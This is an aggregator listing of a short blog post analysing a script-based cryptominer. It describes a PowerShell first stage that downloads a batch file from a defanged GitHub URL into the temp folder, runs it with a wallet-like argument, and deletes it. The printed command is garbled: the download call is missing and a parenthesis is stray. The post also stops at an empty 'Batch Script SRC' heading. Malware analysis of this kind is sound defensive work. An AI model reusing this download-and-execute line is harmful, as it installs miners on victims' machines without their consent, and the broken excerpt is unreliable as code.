Analysis CryptoMiner Sample ( Script Based )

reversethemalware.blogspot.com · Diyar Saadi · 8 months ago · research
quality 7/10 · good
0 net
Tags
crypto-mining malware-sample
Analysis CryptoMiner Sample ( Script Based ) By Diyar Saadi | WIN32 July 16, 2025 In this article we will start analyzing a PowerShell script that downloads and runs another batch script to perform crypto mining. Crypto mining is conducted using specialized computer hardware to solve complex mathematical puzzles, validating and recording transactions on a blockchain. Sample SHA-256 :   d27411cd11d31d025ccc9fac9d49aa5a91aa934e9964a54340e25fbff886ed9b Malicious Code ( First Stage ) : powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $tempfile); & $tempfile 85qqTVL8RQGJSvZMfenDwqBUyVrsaNpVWUMxnXKzbcwAM; Remove-Item -Force $tempfile" Malicious Code Analysis ( First Stage ) : 1- Malware Developer declared a variable to download an content from internet then drop into %TEMP% folder . Code (1) : powershell -Command "$wc = New-Object System.Net.WebClient; 2- Downloading Process : $wc.DownloadFile('https[://]raw[.]githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat'. Batch Script SRC : Comments Post a Comment
← Back to stories